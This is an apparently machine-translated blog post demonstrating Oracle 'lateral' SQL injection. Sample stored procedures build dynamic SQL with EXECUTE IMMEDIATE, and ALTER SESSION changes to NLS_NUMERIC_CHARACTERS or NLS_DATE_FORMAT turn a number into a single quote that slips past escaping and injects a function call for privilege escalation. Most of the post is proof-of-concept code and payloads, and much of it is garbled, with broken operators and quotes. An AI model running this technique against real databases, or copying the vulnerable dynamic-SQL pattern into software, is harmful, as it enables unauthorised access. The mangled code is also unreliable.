ORACLE lateral-sql-injection Personal Insights _oracle Application

Do not worry too much if you execute SQL statements directly or parameter bindings.
such as the following Oracle stored procedures
Create or Replace procedure Kjdatepoc (date D)

As

Begin

INSERT into kjdatetable values (d);

Commit

End

There is no need to worry about being subjected to a new SQL injection attack, so where does the date and number injection attack occur?? Generally, dynamic SQL is used without parameter binding statements.

such as Dbms_sql or execute IMMEDIATE that engineers often use

Look at the following stored procedures

Create or Replace procedure Kjdatepoc (date D)

As

Begin

Execute immediate ' INSERT into kjdatetable values (' | | | | | | ') ';

Commit

End

If you encounter the above stored procedures or functions, and also by modifying the values in the session Nls_date_format to achieve the purpose of SQL injection,

The foreigner's paper explained very detailed, I here also does not have the nonsense.

Only the injection of number type is not more than a simple demonstration can be output single quotes!

Look at the following statement

ALTER session SET nls_numeric_characters= "'."

SELECT to_number (1000.10001, ' 999999d99999′ ') | | " From DUAL;

Output the results

1000′10001

Just one more single quote, what's the use? Optimistic to say! It's valuable in certain situations! Look at one of the following stored procedures

Create or Replace procedure Numinjpoc (Kjexpnum number,kjexpstr varchar2)

Is

Secstr VARCHAR2 (1000);

Begin

Secstr:=replace (Kjexpstr, "", "" ");

Sys.dbms_output.put_line (' SELECT * from DUAL WHERE id= ' | | kjexpnum| | ' and Name= ' | | secstr| | "");

End

The varchar type has been replaced internally! We can do the testing.

Begin

NUMINJPOC (1000, "' – ');

End

Its output SQL statement is

SELECT * from DUAL WHERE id=1000 and Name= "'-'

Single quotes are escaped.

So how do we inject it if we combine this number type?

ALTER session SET nls_numeric_characters= "'."

Begin

Numinjpoc (To_number (0.10001, ' 999999d99999′), ' | | Kj.exp () – ');

End

Check out the output.

SELECT * from DUAL WHERE id= ' 10001 and name= ' | | Kj.exp () – '

So you can attack it indirectly ...

In a certain degree only when the alter session needs to be matched, then attack some functions or processes within the system to elevate permissions. is not a good breakthrough idea, but for a single statement of SQL injection attacks, with the result as a guide! That's not much of a way.